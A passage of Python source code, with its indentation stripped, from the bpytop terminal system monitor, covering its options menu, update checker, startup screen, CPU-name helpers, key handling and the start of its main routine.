if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < option_len + 13 else Term.height // 2 - option_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
